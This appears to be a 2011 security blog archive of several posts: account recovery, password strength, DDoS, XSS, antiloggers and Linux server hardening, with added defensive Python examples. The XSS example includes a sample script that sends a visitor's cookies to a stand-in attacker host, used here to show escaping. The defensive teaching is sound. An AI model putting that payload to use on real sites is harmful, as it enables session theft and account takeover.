Wednesday, April 13, 2011

What to do if your Google/gmail account is hacked?

It is a nightmare if your Google account gets hacked. Most people in this situation waste their money on password recovery services. I don't say they never get the password back, but you can do it yourself by putting in some effort.

I will begin with Google. It's a pity your account got hacked. In most cases it was your own fault that it got hacked; in rare cases it was the hacker who really did something. You should take care. Read more on how to prevent yourself from getting hacked.


Now coming back to the main discussion. You can do the following once hacked.


Change password:- The first thing you need to do in case your account is hacked is change your password and all security details. In most cases the hacker doesn't have your password but your cookies, so once you change it the problem is solved. In case you are not even able to log in, use the following link to reset your password.

Contact Google:- Once you have performed step one, immediately contact Google. You can use one of the forms based on your account type. You will be asked the exact creation date of your Google Account and also a copy of the original "Google Email Verification" message. Only if you are lucky will Google help you. In any case you will receive a reply from them.


With Gmail id:- If you use a Gmail id to log in, then use this form to contact Google.
Without Gmail id:- If your Google Account is not linked to Gmail, i.e. you don't use a Gmail id to log in, then use this form.

Inform all your buddies:- Send a mail to all your buddies informing them that your account has been hacked. Who knows what the hacker might have done.

I was asked by many people to tell them the way to protect their Orkut account. Please reply and give your feedback. This simple tutorial will save you from spam mails and hacking tricks used by many hackers.
As you know, you can hide your primary email address from non-friends, but if by mistake you add an unknown person to your friend list, then he/she will be able to see the primary email address which you use to log in. He can send dangerous emails (keyloggers etc.) and steal your Orkut account. There are two methods to be safe:


1. Changing Primary Email:
Go to the Edit Profile page of your profile, then click on the Contact tab and change your Primary Email address to some other id which you don't use much. Your login id will remain the same, but your friends will see your other email id.

2. Using a Fake Email id:
It is the most effective way of hiding your email id, but it requires a new account. If you have some larger communities and want safety, then follow this method:

Create a new Orkut account. On the Sign Up page enter any id which does not exist, like yourname@yourname.com, me@orkutaccount.com etc.
Then, after entering the other details, you will be redirected to your home page with a message "Verify Your Email". Just ignore it and do as stated below.
Now go to google.com; you will see your fake id (yourname@yourname.com) in the top-right corner, and the "My Account" option there.
Go to the "My Account" page and create a Gmail id from there. (You can see it under Try Some More.)
Done! You have your new login id, but your friends will still see your fake id :| Enjoy
 



Keyloggers are a major problem today, as once they get installed on your computer the hacker can get almost any information. I have written a couple of posts on keylogging and reviewed some of the best keyloggers available nowadays.
The programs specially used to detect and protect your computer from keyloggers are antiloggers. I have tested lots of antiloggers and found that Zemana AntiLogger is the only one capable of detecting almost every keylogger.
Normally a keylogger is detected by a good antivirus or antispyware program, but hackers use methods such as crypting, hexing, binding etc. through which the keylogger can easily bypass antivirus as well as antispyware programs.

Zemana AntiLogger now covers pretty much every aspect of Windows, including registry modification and DLL injection prevention, and protects Windows from other spyware-related techniques with Anti-KeyLogger, Anti-ScreenLogger, Anti-WebLogger and Anti-ClipboardLogger tools of its own. Another useful feature this app has is its whitelist approach (in contrast to the antivirus blacklist approach), meaning it automatically recognizes "safe" programs and does not treat them as "suspects".

For more information on this program and download details, visit the following link:
Zemana Antilogger Download


The area of Mac security software is fairly broad for Mac users. The primary aspects of security software for the Mac are antivirus programs, patches and updates for Mac OS X, and updates for commonly used applications such as the Safari web browser, Adobe Shockwave, and Google Chrome.

In general, Mac users should keep up to date on security fixes for all of the primary items listed above. Applying fixes is automatic in the case of a program like Google Chrome, while the Adobe Shockwave product will inform you of updates so long as you are connected to the Internet.
Security vulnerabilities can reach into Mac email applications as well, to the point where what are known as botnets put out spam email messages using your Mac. That is why you want an antivirus program that is robust and provides security monitoring for email as well as your hard disk and web site usage. Along with that, it is important to stay current on the latest Mac OS X fixes that apply to your operating system. Checking Apple's website to ensure you're current with security fixes is a good way to confirm the facts. There are also web blogs particular to Mac users that will indicate the latest Mac security software issues and fixes for widely-used products such as Safari.

Antivirus programs are plentiful for the latest Mac OS X versions in use. It becomes harder to find support for antivirus software on older Mac OS X versions. Be aware of end-of-life software so that you are not caught short when it comes to security. The latest trojan horses attacking Mac users are also a good thing to be aware of, even if you have solid antivirus software.

Computer security is a big issue and is constantly playing catch-up to those who exploit operating system flaws, browser code weaknesses, and application program security flaws. Security flaws also exist in ancillary programs the Mac uses, such as Java. Java is used heavily for web-based communications and applications. Exploitation of Java can lead to corruption of your local system hard disk and data files.

To avoid suffering the maladies of a compromised Mac computer system, always stay on top of the latest Mac security software fixes and visit trusted web sites, quickly leaving any unfamiliar web site you were referred to or found where you see a lot of pop-up advertising, free software checks of your Mac hard disk, or statements that your Mac may be infected.

For those Mac users that also run a Windows volume or partition, it is wise to have an equally capable antivirus program running on the Windows side. There are viruses that will go between the Windows and Mac sides of your Mac computer. In fact, MS Office products that use Visual Basic macro commands are notorious for being affected by malware and trojans.

The use of a robust antivirus program that will monitor both your Windows and Mac volumes, folders and files is the way to go.


As you know, passwords are the only form of security available nowadays, so it's really important to create strong passwords.
Keeping a weak password can make you vulnerable to attacks such as brute force, dictionary attacks, rainbow tables etc.
So in this article I will tell you how to create a strong password so you can secure your account from getting hacked.

What makes a strong password?


A password can be considered strong if it contains following things:

  • It needs to contain special characters such as @#$%^&
  • It must be at least 8 characters long.
  • It must not contain any common words such as 123, password, your birth date, your login name or any word that can be found in the dictionary. (This will prevent you from getting hacked by a dictionary attack.)
  • a variation of capitalization and small letters
Alternatively there is a website named www.strongpasswordgenerator.com which automatically generates a strong password for you. The website allows you to choose a password length and also gives you hints through which you can easily memorize the password.
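The four rules above as a checker, plus a rough estimate of the keyspace a brute-force attacker must cover. This is an added example, not code from the original post; the wordlist, the login name and the birth date are constructed sample inputs standing in for a real dictionary file and the user's own details.

```python
# Added example (not from the original post): a checker for the four rules the
# post lists, plus a rough brute-force cost estimate. The wordlist and the
# "personal" values (login name, birth date) are constructed sample inputs.
import math
import re

SPECIAL_CHARS = set("@#$%^&*()-_=+[]{};:,.<>?/!\\|~`'\"")

# Constructed stand-in for a real dictionary file; use a full wordlist in practice.
SAMPLE_WORDLIST = {"password", "welcome", "letmein", "dragon", "monkey", "summer"}


def password_problems(password, login_name="", birth_date="", wordlist=SAMPLE_WORDLIST):
    """Return the list of rules from the post that the password fails (empty = strong)."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if not any(c in SPECIAL_CHARS for c in password):
        problems.append("no special character")
    if not (any(c.islower() for c in password) and any(c.isupper() for c in password)):
        problems.append("no mix of upper and lower case")

    lowered = password.lower()
    personal = {v.lower() for v in (login_name, birth_date) if v}
    # Common substrings and personal data are what a dictionary attack tries first.
    common = {"123", "1234", "password", "qwerty"} | personal | wordlist
    hits = sorted(w for w in common if len(w) >= 3 and w in lowered)
    if hits:
        problems.append("contains common/personal words: " + ", ".join(hits))
    return problems


def brute_force_bits(password):
    """Rough entropy estimate: log2 of the keyspace a brute-force attacker must cover.

    Assumes the attacker knows which character classes are in use (a conservative
    guess; a password built from dictionary words is much weaker than this number).
    """
    alphabet = 0
    if re.search(r"[a-z]", password):
        alphabet += 26
    if re.search(r"[A-Z]", password):
        alphabet += 26
    if re.search(r"[0-9]", password):
        alphabet += 10
    if any(c in SPECIAL_CHARS for c in password):
        alphabet += len(SPECIAL_CHARS)
    if alphabet == 0:
        return 0.0
    return round(len(password) * math.log2(alphabet), 1)


if __name__ == "__main__":
    for pw in ("Password123", "sumit1990", "T9#qLw!vRz2m"):
        print(pw, password_problems(pw, login_name="sumit", birth_date="1990"),
              brute_force_bits(pw), "bits")
```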



Hope you liked the post ! Pass the comments 

Security is a topic I've yet to cover here at darkshadow-hacker.blogspot.com, but it is a topic that will be the focus of many future articles. If you are involved in the darkshadow-hacker group, it is especially important to be aware of the security of the programs you are investing in and to take measures to keep your personal information secure.

The first thing I want to talk about is DDoS Protection. I'm sure you've seen programs claim they have DDoS Protection, and I'll mention it in my next article. DDoS Protection is a security measure put in place by a program's host, or at times a third-party company, to protect the website against distributed denial-of-service (DDoS) attacks.
A DDoS attack is an intentional attempt to make a targeted website unavailable to visitors. The purpose is to halt the targeted website's operation and services and shut down the system entirely. This is accomplished by sending dramatically increased traffic to the targeted website, slowing the server to a point where it refuses new connections until the server crashes, causing the website to go down.
DDoS attacks are accomplished by infecting unprotected computers on the internet with malware or trojan viruses. After these "zombie" computers are infected, the malicious programs usually sit idle on the host computer until triggered by the master computer run by the person performing the DDoS attack. At the time of the attack, the "zombie" computers with malicious programs all send communication requests to the target of the DDoS attack until the target's host server crashes. Often there are thousands of infected "zombie" computers across the world that simultaneously attack targeted computers, resulting in slowed response time, overload and eventual crashing of the target's server. Below is a simple graphic showing a visual representation of an attack.
(Image: DDoS Attack)
You may be asking how you can prevent DDoS attacks from happening. The first thing you can do is make sure that your computer is not a "zombie." While protecting your personal computer ultimately does little to prevent DDoS attacks, if everyone protected their computer this sort of attack would be impossible. Small steps can make a huge difference over time. Plus, who knows what other nasty features the malicious software on your computer could have that could put your personal information at risk. Always have an active, updated antivirus program running on your computer and do frequent scans for spyware, malware and viruses. Below are several free anti-virus and spyware programs I recommend for protecting your computer. I will go into further detail on personal protection in a future walkthrough article.
I recommend running either AVG Anti-Virus or Microsoft Security Essentials along with Ad-Aware and Spybot S&D on your computer. Utilizing multiple antivirus and spyware removal programs will reduce the chance of having your computer compromised, and some of the programs pick up items left behind by the others. However, if you have a website, or are a HYIP admin looking for hosting for your program, it is essential to take further steps. One of the red flags in my reviews of HYIP programs is whether or not the admin has taken the time to acquire and set up adequate security for their program.
In their Stopping DDoS Attacks whitepaper, Black Lotus Communications explains the three main strategies to protect a website from DDoS attacks:
  1. The most popular is bandwidth overprovision, when a company purchases additional bandwidth from the Internet Service Provider (ISP) to absorb the harmful traffic in case of a DDoS attack.
  2. The second strategy is to build the DDoS protection infrastructure on the border of the Internet and company network to filter the harmful traffic by using the DDoS-aware Intrusion Detection System (IDS) and firewalls.
  3. The third strategy is the use of hosted DDoS mitigation services offered by ISPs or by companies specializing in these services.
The first strategy, bandwidth overprovision, is not enough to fully protect a website from a DDoS attack. In this strategy, the site purchases additional bandwidth to absorb the DDoS attack's traffic and perform normally. While this can work against small DDoS attacks, anything significant will shut down the site with little trouble.
The second strategy is not commonly used, but is the third-party solution where a filtering system is put in place to detect DDoS attacks and filter them to keep the site up. These solutions can be extremely expensive and work best when used in addition to DDoS mitigation services.
The third solution, DDoS mitigation, is where the host of a site receives and analyzes all communication sent to a website and, if it is determined to be a DDoS attack, the traffic is diverted and dropped, so the targeted server never receives the extreme amounts of traffic, resulting in zero or very little lost website functionality. This sort of protection is extremely expensive to set up individually; however, web host companies such as Black Lotus Communications already have the infrastructure in place, allowing subscribers to benefit from DDoS protection while under their services. This is the most common solution.
That concludes my walkthrough on DDoS attacks, prevention and protection. I hope my explanation answers all your questions and that you've learned some techniques. If you have any questions, please let me know.


XSS, known as Cross Site Scripting, involves the injection of code. What code? This website (Link) gives great examples of the actual code. By studying this code, a webmaster can get a thorough understanding of the code that can be injected. Without viewing this site negatively, it is a great learning tool.


Security is always going to be a concern for both developers and ecommerce business owners alike, since providing a secure environment for making transactions is not only a matter of gaining customer trust, it is also a legal requirement. As websites become more interactive they are utilizing more and more client-side scripting, such as JavaScript, to provide a rich user experience. At the same time, user submitted content is also becoming a standard feature of most websites, the combination of which can leave a website open to what is called a Cross Site Scripting (XSS) attack, which can threaten the privacy of your confidential data.

A common XSS attack will utilize JavaScript, which is run locally on a user's computer, to capture some bit of information and deliver it to the attacker. Most commonly, attackers will configure a script that will harvest cookies from a user's machine. The hope is that the script was run while the user was logged into a protected interface that stores user information in a cookie. Once the attacker has the user information, it can be used to log into the victim's website, with full administrative access. Of course, this is just one type of XSS attack, but it is probably the most common one developers need to worry about.
So how is this done? It all seems so abstract that a piece of scripting code run by a user, and some seemingly insignificant piece of data being stolen, can bring the entire castle down. As with most things, an example seems to help. Let's take a website that allows users to post comments. A malicious user might post a comment with HTML code in it, such as a script tag that contains JavaScript code to steal cookie information. The user submits his/her comment to the website, where it is put into an approval queue, and waits for the fun to begin.
The website owner then logs into his/her administrative interface for the website and starts to review comments. As they click to view the comment from our malicious user, the JavaScript is executed by the browser without the website owner's knowledge. This script (behind the scenes) collects the cookie information for that user's administrative account and sends it to the attacker's website. The attacker can then use that information to log into the website owner's administrative interface, where the attacker proceeds to download account information and credit card numbers for the website's customers.
How could this have been prevented? The simple answer is to not allow visitors to post HTML code or any other markup language. In this extreme defense tactic, all HTML code is dynamically stripped from user submitted content when it is received. However, in many cases this is simply not a viable option, and administrators would like their users to be able to post markup code. Developers should make sure that HTML code is escaped (and therefore not executed by a browser) when initially viewing user submitted content, and that it is not displayed (allowed to be rendered by a browser) until an administrator has had a chance to review it and clear it. Most scripting languages have functions that will automatically strip out or disable HTML code, such as strip_html() in PHP and h() in Ruby.
It's important to remember that we have just outlined one type of Cross Site Scripting attack. There are different variations of XSS attacks that can be used in different ways, so it's important for developers to become familiar with where security holes can exist and how to develop applications that minimize the risk of attack.
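The comment-moderation scenario above, rendered both the vulnerable way and the escaped way. This is an added example, not code from the original article; the comment text is a constructed sample with a placeholder URL, and Python's html.escape stands in for the PHP and Ruby helpers the article names.

```python
# Added example (not from the original article): the comment-moderation scenario
# above, rendered two ways. The comment text is a constructed sample; the
# escaping function used is Python's html.escape, a stand-in for PHP/Ruby helpers.
import html
import re

# Constructed malicious comment of the kind described in the article (the script
# URL is a placeholder, not a real site).
MALICIOUS_COMMENT = (
    "Nice post! <script>document.location='http://attacker.example/steal?c='"
    "+document.cookie</script>"
)

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_comment_unsafe(comment):
    """Vulnerable rendering: user text is dropped straight into the admin page."""
    return "<div class='comment'>" + comment + "</div>"


def render_comment_escaped(comment):
    """Hardened rendering: every <, >, &, and quote becomes an entity, so the
    browser shows the script tag as text instead of executing it."""
    return "<div class='comment'>" + html.escape(comment, quote=True) + "</div>"


def contains_live_script(rendered_html):
    """Simple check: does the output still contain an un-escaped <script tag?"""
    return SCRIPT_TAG.search(rendered_html) is not None


class ModerationQueue:
    """Comments are shown escaped while an admin reviews them and are only moved
    to the approved list after explicit approval, as the article recommends."""

    def __init__(self):
        self.pending = []
        self.approved = []

    def submit(self, comment):
        self.pending.append(comment)

    def review_view(self):
        # The admin review page always uses the escaped renderer.
        return [render_comment_escaped(c) for c in self.pending]

    def approve(self, index):
        self.approved.append(self.pending.pop(index))


if __name__ == "__main__":
    print(render_comment_unsafe(MALICIOUS_COMMENT))
    print(render_comment_escaped(MALICIOUS_COMMENT))
```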

Conclusion:-


XSS (Cross Site Scripting) allows code to be injected into a website. This code can give a malicious person access to your data and secure information. Getting updates, using firewalls and analyzing applications that produce web pages help to prevent Cross Site Scripting. Running penetration tests that include this vulnerability helps show weaknesses before you are hacked. Penetration tests should be run frequently on any web application.

Hope you like this article,

Strong passwords should have a significant length and cannot contain normal words, only random digits and letters of different case. Such passwords are extremely hard to remember and take time to enter. But even strong passwords have their weaknesses. When you type a password, it can be intercepted by a spy program that logs all your keystrokes. Others can see what you type (even if the password field on the screen is masked, the password can be read from the buttons you hit on your keyboard).


Until now, the only solution was to buy a secure token. A secure token is a hardware key that is used instead of or in addition to your normal password authentication. There are two main problems with the hardware solution, though. First, it is expensive. And second, you can use them only with software that has built-in support for this method of authentication.

But, from now on, you can turn any USB flash drive into a secure token! No need to purchase an additional expensive device. All you need is about 2 megabytes of free space on your flash drive or other USB gadget, such as an MP3 player, PDA or even a USB-pluggable mobile handset.
(Image: Strong Password)


How does it work?
Our software, Double Password, installs onto your flash drive. When you type a password, the program intercepts it and converts it into a super-strong password string on the fly. You can use simple, easy-to-remember passwords without the risk of being cracked. Another benefit of using Double Password is that nobody can steal your passwords. Spy programs are useless. Even if someone gets the "weak" password that you type on the keyboard, it means nothing. This password will only work when your USB flash drive is inserted.

While typical hardware locks will work only with software that supports secure tokens, Double Password works with any software. It simply substitutes your weak password with a strong one. Double Password can be effectively used to securely lock your Windows account, to protect your laptop and to bring a new level of security to all software that uses password authentication.

DoS Protection via APF, BFD, DDOS and RootKit

As a web host, your servers are constantly being attacked by hackers with denial-of-service (DoS) and other brute force attacks. There is no foolproof method to stop 100% of all attacks, but there are ways to protect your servers by applying firewall rules and by detecting and banning attacking IPs.

This article makes use of APF, BFD, DDoS Deflate and Rootkit Hunter to detect and protect your server from denial-of-service type attacks. To apply those utilities, please follow the instructions below:

To begin installation, log in to your server as the root user.

% ssh -l root [hostname]
root@[hostname]'s password: [password]
Last login: [Date] from [hostname]

APF -- Advanced Policy-based Firewall

Get the latest source from rfxnetworks and install the software.
# cd /usr/src
# mkdir utils
# cd utils
# wget http://rfxnetworks.com/downloads/apf-current.tar.gz
# tar xfz apf-current.tar.gz
# cd apf-*
# ./install.sh

Read README.apf and README.antidos for configuration options. Edit /etc/apf/conf.apf and modify the following lines to your needs.

DEVEL_MODE="0"
IG_TCP_CPORTS="21,22,25,53,80,110,143,443,3306"
IG_UDP_CPORTS="53,111"
USE_AD="1"

By default, APF is set up to run in development mode, which flushes the firewall rules every 5 minutes. Running in development mode defeats the purpose of running APF, as the rules are flushed automatically every 5 minutes, so DEVEL_MODE is set to "0" above. Configure the ingress (inbound) TCP and UDP ports that need to be opened. Finally, enable AntiDos by setting USE_AD="1".

Edit /etc/apf/ad/conf.antidos as you see fit, and start the APF firewall.

# apf --start

BFD -- Brute Force Detection

BFD is a shell script which parses security logs and detects authentication failures. It is a brute force detection implementation without much complexity, and it works in conjunction with APF (Advanced Policy-based Firewall).

## Get the latest source and untar.
# cd /usr/src/utils
# wget http://rfxnetworks.com/downloads/bfd-current.tar.gz
# tar xfz bfd-current.tar.gz
# cd bfd-*
# ./install.sh
Read the README file, and edit the configuration file located at /usr/local/bfd/conf.bfd.
Find ALERT="0" and replace it with ALERT="1"
Find EMAIL_USR="root" and replace it with EMAIL_USR="username@yourdomain.com"

Edit the /usr/local/bfd/ignore.hosts file and add your own trusted IPs. BFD uses APF and hence overrides allow_hosts.rules, so it is important that you add trusted IP addresses to prevent yourself from being locked out.

## Start the program.
# /usr/local/sbin/bfd -s
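The core of what BFD does, written out as an added example (not BFD's own code, which is a shell script): parse auth-log lines, count failed logins per source address, and produce the ban list while skipping the trusted hosts from ignore.hosts. The log lines are constructed samples, and the apf deny command format is assumed from the APF path used in this article.

```python
# Added example (not part of the original article): the core of what a tool like
# BFD does, in Python: parse auth-log lines, count failed logins per source IP,
# and return the IPs to ban, skipping a trusted-hosts list (the ignore.hosts idea).
# The log lines below are constructed samples, not real logs from any host.
import re
from collections import Counter

SAMPLE_AUTH_LOG = """\
Apr 13 10:01:02 host sshd[2101]: Failed password for root from 203.0.113.7 port 51234 ssh2
Apr 13 10:01:04 host sshd[2101]: Failed password for root from 203.0.113.7 port 51236 ssh2
Apr 13 10:01:07 host sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2
Apr 13 10:01:09 host sshd[2105]: Accepted publickey for sumit from 192.0.2.10 port 40000 ssh2
Apr 13 10:01:11 host sshd[2107]: Failed password for sumit from 192.0.2.10 port 40002 ssh2
Apr 13 10:01:12 host sshd[2107]: Failed password for sumit from 192.0.2.10 port 40003 ssh2
Apr 13 10:01:13 host sshd[2107]: Failed password for sumit from 192.0.2.10 port 40004 ssh2
Apr 13 10:01:20 host sshd[2109]: Failed password for root from 198.51.100.9 port 2222 ssh2
"""

# Matches the sshd "Failed password" line and captures the source address.
FAILED_LOGIN = re.compile(r"sshd\[\d+\]: Failed password for .* from (\S+) port \d+")


def count_failures(log_text):
    """Count failed SSH logins per source IP in the given log text."""
    counts = Counter()
    for line in log_text.splitlines():
        m = FAILED_LOGIN.search(line)
        if m:
            counts[m.group(1)] += 1
    return counts


def hosts_to_ban(log_text, threshold=3, ignore_hosts=()):
    """Return sorted source IPs with >= threshold failures, excluding trusted hosts."""
    ignored = set(ignore_hosts)
    return sorted(ip for ip, n in count_failures(log_text).items()
                  if n >= threshold and ip not in ignored)


def apf_deny_commands(ips):
    """Build the deny commands a BFD-style tool would hand to APF.

    The 'apf -d HOST COMMENT' form and the /usr/local/sbin/apf path are assumed
    from this article; check your APF version's usage before relying on them.
    """
    return ["/usr/local/sbin/apf -d %s 'brute force (bfd)'" % ip for ip in ips]


if __name__ == "__main__":
    # 192.0.2.10 is the admin's own address, listed as trusted so it is never banned.
    banned = hosts_to_ban(SAMPLE_AUTH_LOG, threshold=3, ignore_hosts=["192.0.2.10"])
    for cmd in apf_deny_commands(banned):
        print(cmd)
```

Without the ignore list the admin's own address would be banned after three typos, which is exactly the lockout the ignore.hosts step above guards against.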


DDoS Deflate

## Get the latest source
# cd /usr/src/utils
# mkdir ddos
# cd ddos
# wget http://www.inetbase.com/scripts/ddos/install.sh
# sh install.sh
Edit the configuration file, /usr/local/ddos/ddos.conf, and start DDoS Deflate.

# /usr/local/ddos/ddos.sh -c

RootKit -- Spyware and Junkware detection and removal tool
Go to the Rootkit Hunter homepage and download the latest release.

## Get the latest source and untar
# cd /usr/src/utils
# wget http://downloads.rootkit.nl/rkhunter-<version>.tar.gz
# tar xfz rkhunter-*.gz
# cd rkhunter
# ./installer.sh
## run rkhunter
# rkhunter -c

Setup automatic protection on System Reboot

## Edit /etc/rc.d/rc.local
## (or similar file depending on Linux version)
## Add the following lines at the bottom of the file

/usr/local/sbin/apf --start
/usr/local/ddos/ddos.sh -c

Note:
SYN floods and ICMP DDoS may also be mitigated by using the Linux traffic control utility (tc). For setup instructions, please see the relevant sections of the Linux Advanced Routing & Traffic Control HOWTO.


Notes from the users:

Some users experienced the following error while starting APF.

bash# apf --start

Unable to load iptables module (ip_tables), aborting.

According to Burst and Ryan of r-fx.org, changing the SET_MONOKERN variable in /etc/apf/conf.apf to "1" will correct the problem.

By Sumit Ojha